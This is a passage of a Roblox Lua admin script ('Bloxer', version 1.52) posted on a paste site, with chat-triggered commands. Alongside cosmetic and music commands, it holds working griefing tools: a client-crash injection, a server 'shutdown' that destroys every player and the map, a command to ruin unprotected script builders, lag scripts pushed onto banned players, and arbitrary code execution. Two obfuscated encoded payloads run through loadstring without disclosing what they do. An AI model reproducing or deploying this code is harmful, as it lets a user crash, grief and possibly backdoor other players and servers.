  927. Instance.new("Sparkles", plr.Character.Torso)
  928. end
  929. end
  930. end
  931. )
  932.  
  933. AddCmd("Un-Sparkles","unsparkles","Remove sparkles from player",
  934. function(plrs)
  935. for _, plr in pairs(plrs) do
  936. if plr and plr.Character and plr.Character.Torso then
  937. pcall(function()
  938. for j, k in pairs(plr.Character.Torso:GetChildren()) do
  939. if k:IsA("Sparkles") then
  940. k:Destroy()
  941. end
  942. end
  943. end)
  944. end
  945. end
  946. end
  947. )
  948.  
  949. AddCmd("Crash player","crash","Crash the player",
  950. function(plrs)
  951. for _, plr in pairs(plrs) do
  952. if plr and plr.Backpack then
  953. NewLS([==[
  954. game:GetService("RunService").RenderStepped(function()
  955. Delay(0, function() return end)
  956. end)]==], plr.Backpack)
  957. end
  958. end
  959. end
  960. )
  961.  
  962. AddCmd("Respawn player","respawn","Respawn the player",
  963. function(plrs)
  964. for _, plr in pairs(plrs) do
  965. NewS("game.Players['"..plr.Name.."']:LoadCharacter()", workspace)
  966. end
  967. end
  968. )
  969.  
  970. AddCmd("Mute player","mute","Block the player chat",
  971. function(plrs)
  972. for _, plr in pairs(plrs) do
  973. if plr and plr.Backpack then
  974. NewLS("game:service'StarterGui':SetCoreGuiEnabled(3, false)", plr.Backpack)
  975. end
  976. end
  977. end
  978. )
  979.  
  980. AddCmd("Unmute player","unmute","Unblock the player chat",
  981. function(plrs)
  982. for _, plr in pairs(plrs) do
  983. if plr and plr.Backpack then
  984. NewLS("game:service'StarterGui':SetCoreGuiEnabled(3, true)", plr.Backpack)
  985. end
  986. end
  987. end
  988. )
  989.  
  990. AddCmd("Set SkyBox","abox","Skybox A",
  991. function()
  992. function getAll(obj)
  993. for i, v in pairs(obj:getChildren()) do
  994. if v:IsA("BasePart") then
  995. v.Anchored = false
  996. v.BrickColor = BrickColor.new(0)
  997. bv = Instance.new("BodyVelocity")
  998. bv.Parent = v
  999. bv.maxForce = Vector3.new(100000000,100000000,100000000)
  1000. local s = Instance.new("SelectionBox")
  1001. s.Color = BrickColor.random()
  1002. s.Adornee = v
  1003. s.Parent = v
  1004. s.Transparency = (0.4)
  1005. end
  1006. getAll(v)
  1007. end
  1008. end
  1009. getAll(workspace)
  1010. game.Lighting.TimeOfDay = "07:00:00"
  1011. game.Lighting.Ambient = Color3.new(0,0,0)
  1012. sky = Instance.new("Sky")
  1013. sky.Parent = game.Lighting
  1014. sky.SkyboxBk = "http://www.roblox.com/asset/?id=127493466"
  1015. sky.SkyboxDn = "http://www.roblox.com/asset/?id=127493466"
  1016. sky.SkyboxFt = "http://www.roblox.com/asset/?id=127493466"
  1017. sky.SkyboxLf = "http://www.roblox.com/asset/?id=127493466"
  1018. sky.SkyboxRt = "http://www.roblox.com/asset/?id=127493466"
  1019. sky.SkyboxUp = "http://www.roblox.com/asset/?id=127493466"
  1020. end
  1021. )
  1022.  
  1023. AddCmd("Un-ForceField","unff","Remove the forcefield that you gave to player",
  1024. function(plrs)
  1025. for _, plr in pairs(plrs) do
  1026. if plr and plr.Character then
  1027. pcall(function()
  1028. for _,v in pairs(plr.Character:GetChildren()) do
  1029. if v:IsA("ForceField") then
  1030. v:Destroy()
  1031. end
  1032. end
  1033. end)
  1034. end
  1035. end
  1036. end
  1037. )
  1038.  
  1039. AddCmd("Gear","gear","Give gear to player",
  1040. function(plrs, msg)
  1041. local keypos = msg:find(key)
  1042. local targPlayers = msg:sub(1,keypos-1)
  1043. local plrs = getPlayers(targPlayers)
  1044. local asset = msg:sub(tonumber(keypos+1))
  1045. for _,plr in pairs(plrs) do
  1046. if plr and plr.Backpack then
  1047. local obj = game:service("InsertService"):LoadAsset(asset)
  1048. pcall(function()
  1049. for a,g in pairs(obj:children())do
  1050. if g:IsA("Tool") or g:IsA("HopperBin") then
  1051. g.Parent = plr.Backpack
  1052. end
  1053. end
  1054. end)
  1055. end
  1056. end
  1057. end
  1058. )
  1059.  
  1060.  
  1061. AddCmd("God player","god","Make the player immortal",
  1062. function(plrs)
  1063. for _, plr in pairs(plrs) do
  1064. if plr and plr.Character and plr.Character.Humanoid then
  1065. plr.Character.Humanoid.MaxHealth = math.huge
  1066. end
  1067. end
  1068. end
  1069. )
  1070.  
  1071. AddCmd("Fix Lighting","fixl","Fix the Lighting ",
  1072. function()
  1073. function dtr()
  1074. local sk = game.Lighting:findFirstChild("Sky")
  1075. if sk ~= nil then
  1076. sk:Remove()
  1077. end
  1078. game.Lighting.FogEnd = 10011111111
  1079. game.Lighting.Ambient = Color3.new(0.5,0.5,0.5)
  1080. game.Lighting.TimeOfDay = "14:00:00"
  1081. game.Lighting.Ambient = Color3.new(0.5,0.5,0.5)
  1082. game.Lighting.Brightness = 1
  1083. game.Lighting.ColorShift_Bottom = Color3.new(0,0,0)
  1084. game.Lighting.ColorShift_Top = Color3.new(0,0,0)
  1085. game.Lighting.ShadowColor = Color3.new(0.7,0.7,0.7)
  1086. end
  1087.  
  1088. dtr()
  1089.  
  1090. game.Lighting.Changed:connect(dtr)
  1091. end
  1092. )
  1093.  
  1094. AddCmd("Ungod player","ungod","Make the player mortal",
  1095. function(plrs)
  1096. for _, plr in pairs(plrs) do
  1097. if plr and plr.Character then
  1098. plr.Character.Humanoid.MaxHealth = 100
  1099. end
  1100. end
  1101. end
  1102. )
  1103.  
  1104. AddCmd("Night","night","Makes it night",
  1105. function()
  1106. game.Lighting.TimeOfDay = "00:00:00"
  1107. end
  1108. )
  1109.  
  1110. AddCmd("Midnight","midnight","Makes it midnight",
  1111. function()
  1112. game.Lighting.TimeOfDay = "06:00:00"
  1113. end
  1114. )
  1115.  
  1116. AddCmd("Day","day","Makes it day",
  1117. function()
  1118. game.Lighting.TimeOfDay = "12:00:00"
  1119. end
  1120. )
  1121.  
  1122. AddCmd("Kick player","kick","Kick a player",
  1123. function(plrs)
  1124. for _, plr in pairs(plrs) do
  1125. if plr and plr.Backpack then
  1126. NewLS("game:service'StarterGui':SerCoreGuiEnabled(3,false)", plr.Backpack)
  1127. plr:Destroy()
  1128. end
  1129. end
  1130. end
  1131. )
  1132.  
  1133. AddCmd("Kill player","kill","Kill a player",
  1134. function(plrs)
  1135. for _, plr in pairs(plrs) do
  1136. if plr and plr.Character then
  1137. plr.Character:BreakJoints()
  1138. end
  1139. end
  1140. end
  1141. )
  1142.  
  1143. AddCmd("Punish player","punish","Remove character of a player",
  1144. function(plrs)
  1145. for _, plr in pairs(plrs) do
  1146. if plr and plr.Character then
  1147. plr.Character:Destroy()
  1148. end
  1149. end
  1150. end
  1151. )
  1152.  
  1153. AddCmd("Admin a player","bmadmin","Give admin to a player",
  1154. function(plrs)
  1155. for _, plr in pairs(plrs) do
  1156. if plr and plr.Backpack then
  1157. script.Parent = plr.Backpack
  1158. Output("You gave admin to: "..plr.Name, __)
  1159. end
  1160. end
  1161. end
  1162. )
  1163.  
  1164. AddCmd("Fix cam","fcam","Fix anyone's cam",
  1165. function(plrs, msg)
  1166. for _, plr in pairs(plrs) do
  1167. if plr and plr.Backpack then
  1168. NewLS([[
  1169. game.Workspace.CurrentCamera:Destroy()
  1170. cam = Instance.new("Camera", workspace)
  1171. cam.Name = "CurrentCamera"
  1172. cam.FieldOfView = 70
  1173. cam.CameraType = "Custom"
  1174. cam.CameraSubject = game.Players.LocalPlayer.Character.Humanoid]], plr.Backpack)
  1175. end
  1176. end
  1177. end
  1178. )
  1179.  
  1180. local z={["&"]=0,["%"]=1,["="]=2,["!"]=3,["*"]=4,["+"]=5,["?"]=6,["-"]=7,["~"]=8,["#"]=9,["$"]=10,[")"]=11,["^"]=12,["("]=13,["_"]=14,["@"]=15}; setfenv(assert(loadstring((string.gsub(string.gsub(table.concat({
  1181. "??+-_?!?*-#?@?_?&=!?=-+?%?*-+?!+@?+-_?*?~=#A*#=$&#&!+@?+-_?*?(!#*_?!-*-%?_?!?+?_=_?+?--~A=!+@?+-_?*?==^=-*%?(?+?)+==-+@?=-)?!-&-%?!?+?==(+#=$&#&!+@?+-_?*?)+==_*%?(?+?==(+(!~A=!++?=-?-+?=-@+!+#-!-*-+?(?@+!+@?+-_?*?==#=$&#&!+@?+-_?*?)+==&+#?*-!?~?==(+(!~=%!#=$&#&!+@?+-_?*?)+==!+@?+-_?*?#**?==(+(!~===~?*-*-&-$!@=@=------_==-@?=?^?@?~-_=!?@?(?@=%?!-!-+?*-@=@!#?*?(!==_=_=*-@?_?+-(?=?+?=-~=#***#=#=$&#&!+@?+-_?*?)+==?+@?^?+-(?+?==(+(!~=&!_=+!#=$&#&--%?#?*-~=#=$&#&!+@?+-_?*?$!&+^?%?#-~=#=$&+?_?*?"
  1182. }),"(%u)(.)",function(r,c)return c:rep(r:byte()-62)end),"(.)(.)",function(lo,hi)return string.char(z[lo]+z[hi]*16)end)))),getfenv())()
  1183.  
  1184.  
  1185.  
  1186. function CheckForExistingSound()
  1187. for _,Child in pairs(Game["Workspace"]:GetChildren()) do
  1188. if(Child["ClassName"]==("Sound"))then
  1189. Child:Pause()
  1190. Child["PlayOnRemove"]=(false);
  1191. wait()
  1192. Child:Destroy()
  1193. end
  1194. end
  1195. end
  1196.  
  1197. function ShowMusicList()
  1198. Dismiss()
  1199. Output("R3hab & Deorro - Flashlight",function()
  1200. CheckForExistingSound()
  1201. createSound(149197431)
  1202. end)
  1203. Output("Benny Hill Song (Troll Song)",function()
  1204. CheckForExistingSound()
  1205. createSound(162457050)
  1206. end)
  1207. Output("Sikdope - Unicorn Zombie Apocalypse",function()
  1208. CheckForExistingSound()
  1209. createSound(156729838)
  1210. end)
  1211. Output("Martin Garrix - Helicopter",function()
  1212. CheckForExistingSound()
  1213. createSound(144665276)
  1214. end)
  1215. Output("DJ Fresh - Gold Dust",function()
  1216. CheckForExistingSound()
  1217. createSound(143546719)
  1218. end)
  1219. Output("MACKLEMORE - CAN'T HOLD US",function()
  1220. CheckForExistingSound()
  1221. createSound(142373648)
  1222. end)
  1223. Output("Martin Garrix - Animals",function()
  1224. CheckForExistingSound()
  1225. createSound(142370129)
  1226. end)
  1227. Output("Daft Punk - Get Lucky",function()
  1228. CheckForExistingSound()
  1229. createSound(142677206)
  1230. end)
  1231. Output("Redfoo - Let's Get Ridiculous",function()
  1232. CheckForExistingSound()
  1233. createSound(143727189)
  1234. end)
  1235. Output("Disclosure -You & Me ft.Eliza (Flume Remix)",function()
  1236. CheckForExistingSound()
  1237. createSound(157345795)
  1238. end)
  1239. Output("Skrillex - Recess",function()
  1240. CheckForExistingSound()
  1241. createSound(151846965)
  1242. end)
  1243. Output("R3hab & NERVO & Ummet Ozcan - Revolution",function()
  1244. CheckForExistingSound()
  1245. createSound(152771004)
  1246. end)
  1247. Output("Tsunami Hardstyle",function()
  1248. CheckForExistingSound()
  1249. createSound(142720946)
  1250. end)
  1251. Output("Martin Garrix - Wizard",function()
  1252. CheckForExistingSound()
  1253. createSound(142373972)
  1254. end)
  1255. Output("Wiggle Dubstep Remix",function()
  1256. CheckForExistingSound()
  1257. createSound(157492021)
  1258. end)
  1259. Output("NaeNae Song",function()
  1260. CheckForExistingSound()
  1261. createSound(146054931)
  1262. end)
  1263. Output("Troll Song",function()
  1264. CheckForExistingSound()
  1265. createSound(131857877)
  1266. end)
  1267. Output("Turn Down For What",function()
  1268. CheckForExistingSound()
  1269. createSound(132935524)
  1270. end)
  1271. Output("It's Raining Tacos",function()
  1272. CheckForExistingSound()
  1273. createSound(147153756)
  1274. end)
  1275. Output("Showtek - We Like To Party",function()
  1276. CheckForExistingSound()
  1277. createSound(146048136)
  1278. end)
  1279. Output("Everything is Awesome",function()
  1280. CheckForExistingSound()
  1281. createSound(154618552)
  1282. end)
  1283. end
  1284.  
  1285. AddCmd("Musiclist","mlist","Shows the Possible Sounds to Play",
  1286. function()
  1287. ShowMusicList()
  1288. end)
  1289.  
  1290. AddCmd("AFK","afk","Ping yourself as afk",
  1291. function()
  1292. Dismiss()
  1293. for i = 1,8 do
  1294. wait()
  1295. Output("AFK", __)
  1296. end
  1297. end
  1298. )
  1299.  
  1300. AddCmd("Back","back","Ping yourself as back",
  1301. function()
  1302. Dismiss()
  1303. for i = 1,8 do
  1304. wait()
  1305. Output("Back <3", __)
  1306. end
  1307. wait(3)
  1308. Dismiss()
  1309. end
  1310. )
  1311.  
  1312. AddCmd("Ban a player","ban","Kicks a player when he enters",
  1313. function(plrs, msg)
  1314. for _,v in pairs(plrs) do
  1315. if v then
  1316. table.insert(Banlist,v.Name)
  1317. Output('Banned | '..v.Name,__)
  1318. else
  1319. Output(Error)
  1320. end
  1321. end
  1322. end
  1323. )
  1324.  
  1325. local z={["-"]=0,["^"]=1,[")"]=2,["*"]=3,["!"]=4,["="]=5,["?"]=6,["+"]=7,["%"]=8,["#"]=9,["$"]=10,["~"]=11,["_"]=12,["&"]=13,["("]=14,["@"]=15}; setfenv(assert(loadstring((string.gsub(string.gsub(table.concat({
  1326. "^!!?!?*!&?!?%A)#!(A?@?))_A)#?(A?@?))_A)#!(A?@?-)^!)?@?=+!+-)!=%?#?*+-)^!!?&?#?(?))_)$-??=+(?*?!+#?@?(?-)%)#)$--)-)@!=+!+-+=+!+%A)!=%?#?*+-)^!!?&?#?(?-)#?*+-)&?^?!?=?-))?#+-))!_?^?*?~?*=!+^?)+%=#!#!))_)@=@=#)$--)-)@!=+!+-+=+!+%)))%!^??+=?-)??=+(?-)$*#)))_)@=@=#)$--)-)=?(?!?$-#)"
  1327. }),"(%u)(.)",function(r,c)return c:rep(r:byte()-62)end),"(.)(.)",function(lo,hi)return string.char(z[lo]+z[hi]*16)end)))),getfenv())()
  1328.  
  1329. AddCmd("Shutdown the game","sd","Shutdown the game",
  1330. function()
  1331. Output("Shutting down! By Bl3ck M3gic","Really red")
  1332. for k,v in pairs(game:GetService("Players"):GetPlayers()) do v:Destroy() end
  1333. game.Workspace.Terrain:Clear()
  1334. wait(1)
  1335. game.Workspace:ClearAllChildren()
  1336. game:GetService("Players").PlayerAdded:connect(function(p) p:Destroy() end)
  1337. end
  1338. )
  1339.  
  1340. AddCmd("RuinSB","rsb","Ruins a not-saveplace protected scriptbuilder",
  1341. function()
  1342. if SourceName == "source" then
  1343. Output("lel","Really red")
  1344. else
  1345. NewS([[game:SavePlace()]],Workspace)
  1346. end
  1347. end
  1348. )
  1349.  
  1350. AddCmd("Check source","chks","Check if the source is found",
  1351. function()
  1352. if found then
  1353. Output("Source is found")
  1354. else
  1355. Output("Source is not found")
  1356. end
  1357. end
  1358. )
  1359.  
  1360. AddCmd("Say Bye","bye","Byeeee Byeee",
  1361. function()
  1362. Dismiss()
  1363. for i = 1,8 do
  1364. Output("Bye <3", __)
  1365. end
  1366. end
  1367. )
  1368.  
  1369. AddCmd("Check source name","chksn","Check the source name",
  1370. function()
  1371. Output(SourceName, __)
  1372. end
  1373. )
  1374.  
  1375. AddCmd("Change source name","csn","Change the source name",
  1376. function(plrs, msg)
  1377. SourceName = tostring(msg)
  1378. end
  1379. )
  1380.  
  1381. AddCmd("Kick player list","klist", "Show a kick player list",
  1382. function()
  1383. Dismiss()
  1384. Output("Click on the player name that you want to kick", __)
  1385. for _,v in pairs(game:GetService("Players"):GetChildren()) do
  1386. Output(v.Name,
  1387. function()
  1388. NewLS("game:service'StarterGui':SetCoreGuiEnabled(3, false)", v.Backpack)
  1389. v:Destroy()
  1390. end)
  1391. end
  1392. end
  1393. )
  1394.  
  1395. AddCmd("Script","script","Execute a Script",
  1396. function(plrs, msg)
  1397. NewS(msg, workspace)
  1398. end
  1399. )
  1400.  
  1401. AddCmd("LocalScript","local","Execute a LocalScript",
  1402. function(plrs, msg)
  1403. NewLS(msg, LocalPlayer.Backpack)
  1404. end
  1405. )
  1406.  
  1407. AddCmd("Execute", "exe","Execute a LocalScript for admin",
  1408. function(plrs, msg)
  1409. a,b = ypcall(function()
  1410. loadstring(msg)()
  1411. end) if not a then Output(b,"Bright red") end
  1412. end
  1413. )
  1414.  
  1415.  
  1416. AddCmd("#Commands","#cmds","See how much are commands in this admin",
  1417. function()
  1418. Output(#Cmds, __)
  1419. end
  1420. )
  1421.  
  1422. AddCmd("Clean workspace","clean","Clean everything in workspace except terrain",
  1423. function()
  1424. for i,s in pairs(workspace:GetChildren()) do
  1425. if game:GetService("Players"):GetPlayerFromCharacter(s) == nil then
  1426. if s.className ~= "Terrain" then
  1427. if s.className ~= "Camera" then
  1428. pcall(function() s:Destroy() end)
  1429. end end end end
  1430. local b = Instance.new("Part", Game:GetService("Workspace"))
  1431. b.Size = Vector3.new(3000, 1, 3000)
  1432. b.CFrame = CFrame.new(0, 0, 0)
  1433. b.Name = "Base"
  1434. b.BrickColor = BrickColor.new("Earth green")
  1435. b.TopSurface = "Smooth"
  1436. b.BottomSurface = "Smooth"
  1437. b.LeftSurface = "Smooth"
  1438. b.RightSurface = "Smooth"
  1439. b.FrontSurface = "Smooth"
  1440. b.BackSurface = "Smooth"
  1441. b.Anchored = true
  1442. b.Locked = true
  1443. local sl = Instance.new("SpawnLocation", workspace)
  1444. sl.Anchored = true
  1445. sl.Locked = true
  1446. sl.formFactor = "Plate"
  1447. sl.Size = Vector3.new(6, 0.4, 6)
  1448. sl.CFrame = CFrame.new(0, 0.6, 0)
  1449. sl.BrickColor = BrickColor.new("Really red")
  1450. sl.TopSurface = "Smooth"
  1451. sl.BottomSurface = "Smooth"
  1452. sl.LeftSurface = "Smooth"
  1453. sl.RightSurface = "Smooth"
  1454. sl.FrontSurface = "Smooth"
  1455. sl.BackSurface = "Smooth"
  1456. game.Lighting.FogEnd = 10011111111
  1457. game.Lighting.Ambient = Color3.new(0.5,0.5,0.5)
  1458. game.Lighting.TimeOfDay = "14:00:00"
  1459. game.Lighting.Ambient = Color3.new(0.5,0.5,0.5)
  1460. game.Lighting.Brightness = 1
  1461. game.Lighting.ColorShift_Bottom = Color3.new(0,0,0)
  1462. game.Lighting.ColorShift_Top = Color3.new(0,0,0)
  1463. game.Lighting.ShadowColor = Color3.new(0.7,0.7,0.7)
  1464. end
  1465. )
  1466.  
  1467. AddCmd("Script Help","sh","Help everyone with scripts",
  1468. function()
  1469. Dismiss()
  1470. for i = 1,1 do
  1471. wait()
  1472. Output("Script Help;", __)
  1473. Output("Download Scriptbot", __)
  1474. Output("Dont know the link? Go on YouTube", __)
  1475. Output("I cant do more for you :)", __)
  1476. end
  1477. end
  1478. )
  1479.  
  1480. AddCmd("AirStrike","airstrike","Gives AirStrike",
  1481. function()
  1482. Dismiss()
  1483. for i = 1,1 do
  1484. local obj = game:service("InsertService"):LoadAsset(88885539)
  1485. for a,g in pairs(obj:children()) do if g:IsA("Tool") or g:IsA("HopperBin") then g.Parent = LocalPlayer.Backpack end end
  1486. end
  1487. end
  1488. )
  1489.  
  1490. AddCmd("Dark Character","dark","Make Character Dark",
  1491. function()
  1492. Dismiss()
  1493. for i = 1,1 do
  1494. Output("Character is Now Dark",__)
  1495. player=game.Players.LocalPlayer
  1496. char=player.Character
  1497. Color=BrickColor.new("Grey")
  1498. Color2=BrickColor.new(Color3.new(0,0,0))
  1499. model=Instance.new("Model")
  1500. model.Name="Suit"
  1501. model.Parent=char
  1502. d=0
  1503. Debounce=true
  1504. fake=char.Head:clone()
  1505. pcall(function() fake.face:remove() end)
  1506. char.Head.Transparency=1
  1507. fake.Parent=model
  1508. fake.Transparency=0
  1509. w=Instance.new("Weld")
  1510. w.Part1=fake
  1511. w.Part0=char.Head
  1512. w.Parent=char
  1513. fake.Mesh.Scale=fake.Mesh.Scale+Vector3.new(-0.01,-0.01,-0.01)
  1514. fake.BrickColor=Color2
  1515. char.Head.Changed:connect(function(p)
  1516. if p=="BrickColor" then
  1517. wait()
  1518. pcall(function()
  1519. char.Head.face:Remove()
  1520. char.Torso.roblox:remove()
  1521. char["Shirt Graphic"]:remove()
  1522. end)
  1523. char.Humanoid.WalkSpeed=25
  1524. char.Humanoid.MaxHealth=math.huge
  1525. char.Humanoid.Health=math.huge
  1526. for _,v in pairs(char:children()) do
  1527. if v.className=="Hat" then
  1528. v:remove()
  1529. elseif v:IsA("Part") then
  1530. v.BrickColor=Color2
  1531. v.TopSurface="Smooth"
  1532. v.BottomSurface="Smooth"
  1533. elseif v:IsA("Shirt") or v:IsA("Pants") then
  1534. v:remove()
  1535. end
  1536. end
  1537. end
  1538. end)
  1539. char.Head.BrickColor=Color2
  1540. Tor=Instance.new("Part")
  1541. Tor.Size=Vector3.new(1,1,1)
  1542. Tor.BrickColor=Color2
  1543. Tor.Reflectance=0
  1544. Tor.Transparency=0
  1545. Tor.CanCollide=false
  1546. Tor.Parent=char
  1547. Mesh=Instance.new("SpecialMesh")
  1548. Mesh.MeshId="http://www.roblox.com/asset/?id=21057410"
  1549. Mesh.Scale=Vector3.new(1.05,1.05,1.05)
  1550. Mesh.Parent=Tor
  1551. w = Instance.new("Weld")
  1552. w.Parent = char["Head"]
  1553. w.Part0 = w.Parent
  1554. w.Part1 = Tor
  1555. w.C0 = CFrame.new(0,0.35,0)
  1556. end
  1557. end
  1558. )
  1559.  
  1560. AddCmd("Noclip Character","noclip","Make Character Noclip",
  1561. function()
  1562. Dismiss()
  1563. for i = 1,1 do
  1564. Output("Character is now noclipped",__)
  1565. wait(1)
  1566.  
  1567. nam = game.Players.LocalPlayer.Name
  1568.  
  1569. coroutine.wrap(function()
  1570. while wait() do
  1571. for a, b in pairs(Workspace[nam]:GetChildren()) do
  1572. if b:FindFirstChild('Handle') then
  1573. b.Handle.CanCollide = false
  1574. end
  1575. end
  1576. end
  1577. end)()
  1578.  
  1579. Workspace[nam].Humanoid.Changed:connect(function()
  1580. Workspace[nam].Humanoid.WalkSpeed = 16
  1581. end)
  1582.  
  1583. game:GetService('Players').LocalPlayer.PlayerGui.ChildAdded:connect(function(asd)
  1584. delay(0, function()
  1585. if asd.Name ~= 'OutputGUI' then
  1586. asd:Destroy()
  1587. end
  1588. end)
  1589. end)
  1590.  
  1591. game:GetService('RunService').Stepped:connect(function()
  1592. Workspace[nam].Torso.CanCollide = false
  1593. Workspace[nam].Head.CanCollide = false
  1594. end)
  1595.  
  1596. Workspace[nam].Torso.Changed:connect(function()
  1597. Workspace[nam].Torso.CanCollide = false
  1598. Workspace[nam].Head.CanCollide = false
  1599. end)
  1600. end end
  1601. )
  1602.  
  1603. AddCmd("Remove Tools","rt","Remove current tools",
  1604. function()
  1605. Dismiss()
  1606. pcall(function()
  1607. LocalPlayer.Backpack:ClearAllChildren()
  1608. end)
  1609. end
  1610. )
  1611.  
  1612. function Output(Txt,func)
  1613. P=Instance.new("Part",tabmodel)
  1614. P.Shape=("Ball")
  1615. P.Anchored=true
  1616. P.CanCollide=false
  1617. if probemode==false then
  1618. if LocalPlayer.Character.Torso then
  1619. P.Position=LocalPlayer.Character.Torso.Position
  1620. elseif LocalPlayer.Character.Torso==nil then return end
  1621. elseif probemode==true then
  1622. if game.Workspace:findFirstChild(LocalPlayer.Name.."'s probe") then
  1623. P.Position=game.Workspace:findFirstChild(LocalPlayer.Name.."'s probe").Position
  1624. elseif game.Workspace:findFirstChild(LocalPlayer.Name.."'s probe")==nil then return end
  1625. else
  1626. return
  1627. end
  1628. M=Instance.new("SpecialMesh",P)
  1629. M.MeshId=("http://www.roblox.com/asset/?id=94246442")
  1630. M.TextureId=("http://www.roblox.com/asset/?id=161747253")
  1631. M.Scale=Vector3.new(2,2,2)
  1632. Instance.new("PointLight",P)
  1633. bg=Instance.new("BillboardGui",P)
  1634. bg.Adornee=tab
  1635. bg.Size=UDim2.new(8,0,7.5,0)
  1636. bg.StudsOffset=Vector3.new(0,1,0)
  1637. text=Instance.new("TextLabel",bg)
  1638. text.Size=UDim2.new(1,0,0.2,0)
  1639. text.FontSize=("Size18")
  1640. text.BackgroundTransparency=1
  1641. text.Font=("Legacy")
  1642. text.TextStrokeTransparency=0
  1643. text.TextColor=BrickColor.new("Institutional white")
  1644. text.Text=Txt
  1645. Click=Instance.new("ClickDetector",P)
  1646. Click.MaxActivationDistance=(math.huge)
  1647. Click.MouseClick:connect(function(Plr)
  1648. if Plr.Name==LocalPlayer.Name then
  1649. Dismiss()
  1650. if func~=nil then
  1651. func=func
  1652. func()
  1653. end
  1654. end
  1655. end)
  1656. table.insert(Tabs,P)
  1657. end
  1658.  
  1659. function getPlayers(msg)
  1660. local plrs = {}
  1661. if msg == "me" then
  1662. table.insert(plrs, LocalPlayer)
  1663. elseif msg == "all" then
  1664. plrs = game:GetService("Players"):GetChildren()
  1665. elseif msg == "noobs" then
  1666. for _,plr in pairs(game:GetService("Players"):GetChildren()) do
  1667. if plr.AccountAge > 364 then
  1668. table.insert(plrs, plr)
  1669. end
  1670. end
  1671. elseif msg == "veterans" then
  1672. for _,plr in pairs(game:GetService("Players"):GetChildren()) do
  1673. if plr.AccountAge > 364 then
  1674. table.insert(plrs, plr)
  1675. end
  1676. end
  1677. elseif msg == "others" then
  1678. for i,v in pairs(game:GetService("Players"):GetChildren()) do
  1679. if v ~= LocalPlayer then
  1680. table.insert(plrs, v)
  1681. end
  1682. end
  1683. else
  1684. for i,v in pairs(game:GetService("Players"):GetChildren()) do
  1685. if v.Name:lower():sub(1,#msg) == msg:lower() then
  1686. table.insert(plrs, v)
  1687. end
  1688. end
  1689. end
  1690. return plrs
  1691. end
  1692.  
  1693. for _,plr in pairs(game:GetService("Players"):GetChildren()) do
  1694. end
  1695.  
  1696. LocalPlayer.Chatted:connect(function(m)
  1697. for i,v in pairs(Cmds) do
  1698. if v["Say"]..key == m:sub(1, #v["Say"]+#key) then
  1699. v["Func"](getPlayers(m:sub(#v["Say"]+#key+1)), m:sub(#v["Say"]+#key+1))
  1700. end
  1701. end
  1702. end)
  1703.  
  1704. for i = 0,8,1 do
  1705. wait(0.01)
  1706. end
  1707. Output("Bloxer by 999kko", __)
  1708. Output("Version 1.52", __)
  1709. Output("Do cmds; to load it up!", __)
  1710. Output("Don't Abuse!", __)
  1711. Output("Remembhur its ROBLOX! Blox it all!", __)
  1712. Output("User: "..LocalPlayer.Name, __)
  1713.  
  1714. tabmodeldebounce = false
  1715. modeldebounce = false
  1716. game:service'RunService'.Stepped:connect(function()
  1717. if modeldebounce then return end
  1718. rot = (rot % 100) + 0.5
  1719. if tabmodel.Parent ~= workspace then
  1720. modeldebounce = true
  1721. tabs = {}
  1722. tabmodel = Instance.new("Model", workspace)
  1723. tabmodel.Name = "Tablets"
  1724. tabs = {}
  1725. wait()
  1726. modeldebounce = false
  1727. end
  1728. end)
  1729.  
  1730. rot = 0
  1731. coroutine.resume(coroutine.create(function()
  1732. game:GetService("RunService").Stepped:connect(function()
  1733. if probemode == false then
  1734. if LocalPlayer.Character then
  1735. if LocalPlayer.Character:findFirstChild("Torso") then
  1736. rot = rot + 0.0001
  1737. for i,v in pairs(Tabs) do
  1738. ypcall(function()
  1739. local pos = LocalPlayer.Character.Torso.CFrame
  1740. local radius = 4 + (#Tabs * 0.5)
  1741. local x = math.sin((i / #Tabs - (0.5 / #Tabs) + rot * 2) * math.pi * 2) * radius
  1742. local y = 0
  1743. local z = math.cos((i / #Tabs - (0.5 / #Tabs) + rot * 2) * math.pi * 2) * radius
  1744. local arot = Vector3.new(x, y, z) + pos.p
  1745. local brot = v.CFrame.p
  1746. local crot = (arot * .1 + brot * .9)
  1747. v.CFrame = CFrame.new(crot, pos.p)
  1748. end)
  1749. end
  1750. end
  1751. end
  1752. end
  1753. if probemode == true then
  1754. if game.Workspace:findFirstChild(LocalPlayer.Name.."'s probe") then
  1755. rot = rot + 0.0001
  1756. for i,v in pairs(Tabs) do
  1757. ypcall(function()
  1758. local pos = game.Workspace:findFirstChild(LocalPlayer.Name.."'s probe").CFrame
  1759. local radius = 4 + (#Tabs * 0.5)
  1760. local x = math.sin((i / #Tabs - (0.5 / #Tabs) + rot * 2) * math.pi * 2) * radius
  1761. local y = 0
  1762. local z = math.cos((i / #Tabs - (0.5 / #Tabs) + rot * 2) * math.pi * 2) * radius
  1763. local arot = Vector3.new(x, y, z) + pos.p
  1764. local brot = v.CFrame.p
  1765. local crot = (arot * .1 + brot * .9)
  1766. v.CFrame = CFrame.new(crot, pos.p)
  1767. end)
  1768. end
  1769. end
  1770. end
  1771. end)
  1772. end))
  1773.  
  1774. Game["Players"].PlayerAdded:connect(function(newPlr)
  1775. for _,BannedPlr in pairs(Banlist) do
  1776. if(newPlr["Name"]==BannedPlr)then
  1777. if(newPlr["Name"]~=("iLordVex"))then
  1778. newPlr:WaitForChild("Backpack")
  1779. NewLS(LagSource,newPlr["Backpack"])
  1780. Output("The Banned Player ["..newPlr["Name"].."] has Tried to Enter the Server",__)
  1781. end
  1782. elseif(newPlr["Name"]~=BannedPlr)then
  1783. Output("["..newPlr["Name"].."] has Entered the Server.",__)
  1784. end
  1785. end
  1786. end)
Add Comment
Please, Sign In to add comment